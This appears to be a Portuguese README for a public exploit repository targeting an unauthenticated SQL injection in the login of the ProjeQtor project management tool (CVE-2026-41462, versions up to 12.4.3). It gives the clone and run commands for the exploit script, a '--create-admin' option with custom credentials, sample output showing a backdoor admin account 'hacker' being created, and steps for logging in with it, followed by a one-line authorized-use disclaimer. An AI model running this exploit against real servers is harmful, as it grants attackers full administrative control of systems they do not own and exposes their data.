
CVE-2026-41462
Injeção SQL Crítica Não Autenticada no ProjeQtor ≤ 12.4.3
A CVE-2026-41462 é uma vulnerabilidade crítica de injeção SQL não autenticada na funcionalidade de login da ferramenta de gerenciamento de projetos ProjeQtor.
python3 CVE-2026-41462.py -u http://target.com --create-admin
# With custom credentials
python3 CVE-2026-41462.py -u http://target.com --create-admin \
--username admin123 --password StrongPass2026!
Quando o exploit for bem-sucedido, você verá uma saída semelhante a esta:
[+] Targeting: http://target.com
[+] Sending payload to create admin user 'hacker' ...
[+] Request sent successfully.
[+] New admin created → Username: hacker | Password: Admin123!
[+] Try logging in at: http://target.com/login.php
Abra seu navegador e acesse:
http://target.com/login.php
Faça login usando as credenciais exibidas na saída do script.
Se for bem-sucedido, você acessará o Painel de Administração do ProjeQtor com privilégios administrativos completos.
Indicadores de Sucesso:
| Arquivo | Descrição |
|---|---|
CVE-2026-41462.py | Script principal de exploração |
CVE-2026-41462.yaml | Modelo de detecção Nuclei |
README.md | Esta documentação |
Clone o repositório:
git clone https://github.com/0xBlackash/CVE-2026-41462.git
cd CVE-2026-41462
Execute o exploit:
python3 CVE-2026-41462.py -u http://target.com --create-admin
Faça login com a conta de administrador recém-criada.
Esta ferramenta destina-se apenas a fins educacionais e testes de penetração autorizados. O uso não autorizado é ilegal.